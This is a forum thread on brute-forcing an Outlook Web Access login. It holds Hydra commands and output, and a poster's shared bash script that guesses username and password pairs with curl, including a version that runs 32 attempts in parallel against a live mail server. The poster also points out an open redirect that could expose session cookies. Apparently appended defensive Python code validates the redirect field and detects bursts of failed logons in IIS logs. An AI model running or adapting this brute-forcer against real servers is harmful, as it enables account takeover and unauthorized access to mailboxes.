Thread: "302 Moved Temporarily" problem when using Hydra - OWA "Outlook Web Access"

  1. #1
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default "302 Moved Temporarily" problem when using Hydra - OWA "Outlook Web Access"

    I have problems getting results from hydra when testing an OWA-only enabled mail server:
    Code:
    hydra -l leo -p 123 mail.company.com  https-post-form "/exchweb/bin/auth/owaauth.dll:destination=https%3A%2F%2Fmail.company.com%2Fexchange%2F&flags=0&username=Domain%5C^USER^&password=^PASS^&I1.x=0&I1.y=0:You could not be logged"
    Then I get a bunch of "BAD Request" errors and false positives.

    I got the POST data from running OWASP ZAP as a proxy.

    Here's what happens:
    #1- [REQUEST] POST https://mail.company.com/exchweb/bin/auth/owaauth.dll <-- along with the POST data
    #1- [RESPONSE] HTTP/1.1 302 Moved Temporarily -- Location: https://mail.company.com/exchange/ <-- with a couple of set-cookie's
    #2- [REQUEST] GET https://mail.company.com/exchange/
    #2- [RESPONSE] HTTP/1.1 302 Moved Temporarily -- Location: https://mail../../owalogon.asp?url=h...ange/&reason=2
    #3- I "GET" the same login page with "&reason=2" that will display the error message "You could not be logged..."

    The problem is that hydra expects to see the text "You could not be logged" in the body of the response at "#1" to determine whether the password is correct or not, and since the response is a 302 without a body, it just assumes that the password has been found and does not follow the 302 directions until it gets an actual body in a reply.

    Any ideas? "I tried owabf.py, it just didn't work for me, all false positives"
    Thanks in advance.

  2. #2
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: "302 Moved Temporarily" problem when using Hydra - OWA "Outlook Web Access"

    What happens if you make your failure string "reason" or "reason=2"?

    Instead of targeting the web interface is there a POP3 or IMAP interface you could bruteforce?
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  3. #3
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default Re: "302 Moved Temporarily" problem when using Hydra - OWA "Outlook Web Access"

    Won't (didn't) work, since Hydra will look for it in the body, not the URI; also, Hydra doesn't even follow the redirection to the stage where "reason=2" shows up.
    Let me show you the output with -v:

    Code:
    Hydra v6.2 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
    Hydra (http://www.thc.org/thc-hydra) starting at 2011-04-21 03:49:33
    [VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 1.
    [DATA] 1 tasks, 1 servers, 1 login tries (l:1/p:1), ~1 tries per task
    [DATA] attacking service http-post-form on port 443
    [VERBOSE] Resolving addresses ... done
    [STATUS] attack finished for mail.company.com (waiting for children to finish)
    HTTP/1.1 302 Moved Temporarily
    Content-Length: 0
    Location: https://mail.company.com/exchange/
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Set-Cookie: sessionid=4df5a08a-c477-48d9-xxxx-c919cc4b7b06; path=/
    Set-Cookie: cadata="1++akuxxxY3baBWj2fxxxxxYjaL5stueaBcOIqvJmJ6rVWKepNtA=="; HttpOnly; secure; path=/
    Date: Thu, 21 Apr 2011 02:49:35 GMT
    Connection: close
    As you can see, it just looked at the reply, and didn’t follow…

    HOWEVER, you gave me an excellent idea, will use “302 Moved” as the failure string hoping that the reply will change if I’m successful “even though I believe OWA decided I don’t have the right to view https://mail.company.com/exchange/ using GET with the given cookies at the second redirect, not this one”, will install exchange and OWA on my lab to test and will keep you informed.

    And regarding your second question, it's only OWA enabled.

    In the meantime, does anyone else have ideas about brute-ing OWA?
    Last edited by SherifEldeeb; 04-21-2011 at 03:07 AM.

  4. #4
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default Re: "302 Moved Temporarily" problem when using Hydra - OWA "Outlook Web Access"

    More on the "help-you-so-you-might-help-me" information:
    The "https://mail.company.com/exchange/" comes from the POST data parameter "destination=https%3A%2F%2Fmail.company.com%2Fexchange%2F" which is mandatory "i.e. when I removed it from the POST data at the intercepting proxy, or made it 'destination=&...', it gave me 400 Bad Request".

    And when I modify it to something like "google.com" it 302-redirects me to google.com! With the set cookies!!!! "That's a damn serious issue with that web application that could be used to hijack sessions among other things!!! But let's focus on the brute forcing".

    So, I believe the 302 redirection will ALWAYS happen.

    Help, ... please, anyone?

    "P.S. will open owabf.py and see how it works(not), even though I'm not good at python."
    EDIT: owabf.py checks in the body of the reply for a string that indicates a "STANDARD" image file href known to be there when rejected, ... modified and still not working.

    EDIT: I'll just write my own bash script that uses "cURL -L -s" and do it myself; will post it here once I get it done ...
    Last edited by SherifEldeeb; 04-21-2011 at 04:59 AM.
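
The `destination` behaviour described in the post above is an open redirect. The check below is an added example, not part of the original thread or of OWA itself: it shows the validation a filter in front of the login form could apply to that field. The function names and the idea of running it in a reverse proxy are assumptions.

```python
from urllib.parse import parse_qs, urlsplit

def destination_is_safe(destination: str, request_host: str) -> bool:
    """True only if the decoded destination is an HTTPS URL on request_host."""
    # Reject empty values, backslashes and whitespace that clients normalise differently.
    if not destination or "\\" in destination or any(c.isspace() for c in destination):
        return False
    try:
        parts = urlsplit(destination)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False
    if parts.scheme.lower() != "https":
        return False  # also rejects scheme-less values such as "google.com" or "//host/"
    if parts.username is not None or parts.password is not None:
        return False  # userinfo trick: "https://mail.company.com@other.example/"
    if (parts.hostname or "").lower() != request_host.lower():
        return False
    return port in (None, 443)

def login_post_is_safe(body: str, request_host: str) -> bool:
    """Check the form body of a POST to owaauth.dll before it reaches OWA."""
    values = parse_qs(body, keep_blank_values=True).get("destination", [])
    # Exactly one destination field: duplicates invite parser disagreement.
    return len(values) == 1 and destination_is_safe(values[0], request_host)

# Constructed sample bodies modelled on the POST data quoted in the thread.
GOOD = "destination=https%3A%2F%2Fmail.company.com%2Fexchange%2F&flags=0&username=u&password=p"
BAD = "destination=https%3A%2F%2Fgoogle.com%2F&flags=0&username=u&password=p"

if __name__ == "__main__":
    print(login_post_is_safe(GOOD, "mail.company.com"))  # True
    print(login_post_is_safe(BAD, "mail.company.com"))   # False
```
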

  5. #5
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default Re: "302 Moved Temporarily" problem when using Hydra - OWA "Outlook Web Access"

    I did a very simple bash script (I'm by no means a pro) that did what I want; I'm sharing this so maybe someone else might find something useful in it.
    However, it is S L O W (no multi-threading), lacks error handling, has lots of hard-coded data in it, and the output is not very descriptive when a successful user:pass is found.
    If you want to use it, change the POST data since mine was slightly modded from the std, and make sure it's http/https.

    Code:
    script.sh usernames passlist mail.company.com
    it uses 'curl'
    -d "POST data" <-- this is where the user & pass will go, I did two nested for loops to go through the lists.
    -L to follow the 302 redirects
    -s to be silent and not display the HTTP headers
    then piped the output to grep to show if a certain sentence I know that it exists in the inbox page shows up.


    Stupid, but works.

    Code:
    #!/bin/bash
    show_help(){
    echo YAOWAB "Yet another Outlook Web Access Brute-forcer"
    echo "Usage: $0 USERNAME_LIST PASSWORD_LIST WEBMAIL_SITE"
    echo by sherif eldeeb.
    }
    
    ########## STANDARD CHECKS BEFORE STARTING #########
    
    #checking number of arguments, if less than 3, exit!
    if [ $# -lt 3 ]
    then
      echo "[-] ERROR: Arguments are less than 3"
      echo
      show_help;
      exit 1
    fi
    
    #checking the existence of username file,
    if [ -f "$1" ]
    then
      echo "[*] Using $1 as username list"
    else
    	echo "[-] ERROR: Username file doesn't exist"
    	echo
    	show_help;
    	exit 1
    fi
    
    #checking the existence of passwords file,
    if [ -f "$2" ]
    then
      echo "[*] Using $2 as password list"
    else
    	echo "[-] ERROR: Passwords file doesn't exist"
    	echo
    	show_help;
    	exit 1
    fi
    
    # curl check (output discarded, only the exit status matters)
    which curl >/dev/null 2>&1
    if [ $? -ne 0 ] ; then
    	echo "[-] ERROR: 'curl' not found! exiting..."
    	exit 1
    fi
    
    ############ END OF STANDARD CHECKS   ##############
    
    echo "[*] Starting..."
    for k in $(cat "$1")
    do
    	for i in $(cat "$2")
    	do
    		echo "[*] Trying \"$k\" with password \"$i\"..."
    		curl -d "destination=https%3A%2F%2F$3%2Fexchange&flags=0&username=$k&password=$i&I1.x=0&I1.y=0" "https://$3/exchweb/bin/auth/owaauth.dll" -L -s -b cookies.txt | grep -i "This page uses frames, but your browser doesn"
    	done
    done
    Last edited by SherifEldeeb; 04-24-2011 at 05:00 AM. Reason: user:Pass was interestingly interpreted to "user ass" after changing ":p" to a smiley with a tongue out of its mouth...

  6. #6
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default Re: "302 Moved Temporarily" problem when using Hydra - OWA "Outlook Web Access"

    This is going to be my last question in this thread:
    Is there a way to make the bash script always have 16 instances of curl running "like hydra" to speed things up?

    Adding the "&" to the end of the line will choke the machine and will fail "will send all the user pass pairs AT ONCE", and doing a for loop with 16 will wait till ALL the 16 are done and then it initializes the next batch of 16, right?

  7. #7
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default Re: "302 Moved Temporarily" problem when using Hydra - OWA "Outlook Web Access"

    Even though it is very, very obvious that I'm probably talking to myself regarding my own issue here on the forum, I'll list a solution I found that enabled me to run 32 instances of curl at once, then back off if the number of curl processes exceeded 32, then launch another 32 curl again, the concept applies to anything "bash-able".

    just modify the following lines
    Code:
    for k in $(cat $1)
    do
    	for i in $(cat $2)
    	do
    		echo "[*] Trying \"$k\" with password \"$i\"..."
    		curl -d "destination=https%3A%2F%2F$3%2Fexchange&flags=0&username=$k&password=$i&I1.x=0&I1.y=0" https://$3/exchweb/bin/auth/owaauth.dll -L -s -b cookies.txt | grep -i "This page uses frames, but your browser doesn"
    	done
    done
    to look like this

    Code:
    for k in $(cat $1)
    do
    	for i in $(cat $2)
    	do
    		CurlCount=$(pidof curl | wc -w)
    		[ "$CurlCount" -ge 32 ] && continue
    		echo "[*] Trying \"$k\" with password \"$i\"..."
    		curl -d "destination=https%3A%2F%2F$3%2Fexchange&flags=0&username=$k&password=$i&I1.x=0&I1.y=0" https://$3/exchweb/bin/auth/owaauth.dll -L -s -b cookies.txt | grep -i "This page uses frames, but your browser doesn" &
    	done
    done
    Please note the "&" at the end of the long curl command...

    That did the trick, I got very good results "speed was very comparable to hydra after adding the target domain to /etc/hosts since it was DNS resolving it EVERY TIME".

    I'm a happy man again.

    P.S: I am pretty sure there's a much {easier, faster, better} way to do it, but I only know little bash, and that's it.
    P.S: I just realized that I have to add another "break" statement... will modify this post later...
    Last edited by SherifEldeeb; 04-24-2011 at 10:43 AM.
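
On the server side, every failed attempt described in this thread ends with a GET of owalogon.asp carrying `reason=2`, so the guessing shows up in the IIS logs as a burst of those requests from one client. The detector below is an added example, not part of the original thread. It assumes IIS W3C extended logging with the listed fields enabled; the log lines, the directory placeholder, the threshold and the window are all constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

FIELDS = "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status"
LOGON = "/path-elided/owalogon.asp"  # placeholder: the thread elides the directory
FAIL_Q = "url=placeholder&reason=2"  # placeholder url value; reason=2 is from the thread

def _line(sec, ip, stem, query):
    t = datetime(2011, 4, 21, 2, 49, 0) + timedelta(seconds=sec)
    return f"{t:%Y-%m-%d %H:%M:%S} {ip} GET {stem} {query} 200"

# Constructed sample: 192.0.2.10 lands on the failure page 8 times in 14 s,
# 198.51.100.7 twice, ten minutes apart, followed by a normal mailbox request.
SAMPLE_LOG = "\n".join(
    ["#Software: constructed sample", FIELDS]
    + [_line(2 * n, "192.0.2.10", LOGON, FAIL_Q) for n in range(8)]
    + [_line(20, "198.51.100.7", LOGON, FAIL_Q),
       _line(620, "198.51.100.7", LOGON, FAIL_Q),
       _line(625, "198.51.100.7", "/exchange/", "-")]
)

def parse_w3c(text):
    """Yield one dict per request, using the column order from the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if fields and len(values) == len(fields):
                yield dict(zip(fields, values))

def is_failed_logon(rec):
    """The failed-login landing page from the thread: owalogon.asp with reason=2."""
    stem = rec.get("cs-uri-stem", "").lower()
    return stem.endswith("/owalogon.asp") and "reason=2" in rec.get("cs-uri-query", "").lower().split("&")

def flag_guessing(text, threshold=5, window=timedelta(seconds=60)):
    """Map client IP -> peak number of failed logons seen inside one window."""
    recent, flagged = defaultdict(deque), {}
    for rec in parse_w3c(text):
        if not is_failed_logon(rec):
            continue
        ts = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        q = recent[rec["c-ip"]]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            flagged[rec["c-ip"]] = max(flagged.get(rec["c-ip"], 0), len(q))
    return flagged
```

Many users behind one NAT address share a client IP, so the threshold needs tuning against normal traffic, and counting distinct usernames per IP would need the POST body, which IIS does not log.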
